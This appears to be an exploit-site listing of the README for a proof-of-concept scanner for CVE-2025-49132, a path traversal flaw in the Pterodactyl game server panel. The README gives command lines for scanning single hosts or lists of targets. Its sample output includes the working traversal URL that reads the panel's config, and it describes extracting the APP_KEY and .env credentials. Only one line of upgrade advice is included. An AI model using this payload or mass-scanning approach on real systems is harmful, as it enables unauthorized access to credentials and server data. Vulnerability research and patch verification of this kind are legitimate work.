Exploit for CVE-2025-49132

## https://sploitus.com/exploit?id=511E2EFB-E975-581F-A65C-88A7CF402A5B
# CVE-2025-49132_poc

## 使用示例

1. **扫描单个目标**：
```bash
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
```

2. **扫描目标列表**：
```bash
python3 CVE-2025-49132_poc.py -f 目标列表.txt
```

3. **保存扫描结果**：
```bash
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
```

## 输出示例：

**存在漏洞时**：
```
[+] 存在漏洞: 漏洞确认

    漏洞详情:
      • 漏洞类型: 路径遍历
      • 攻击向量: 通过路径遍历参数访问 /locales/locale.json
      • 利用 URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
      
    潜在影响:
      • 读取面板配置文件 (.env) 中的凭据
      • 提取数据库中的敏感信息
      • 访问面板管理的游戏服务器文件
    
    提取的 APP_KEY: base64{{your_secret_key_here}}
    
    修复建议: 立即升级到 Pterodactyl v1.11.11 或更高版本
```

**不存在漏洞时**：
```
[-] 不存在漏洞: 不存在漏洞 (状态码: 404)
```

**扫描摘要**：
```
扫描摘要:
  • 扫描目标总数: 5
  • 存在漏洞的目标: 2
  • 安全的目标: 3

[!] 严重: 检测到存在漏洞的系统! 需要立即采取措施。
```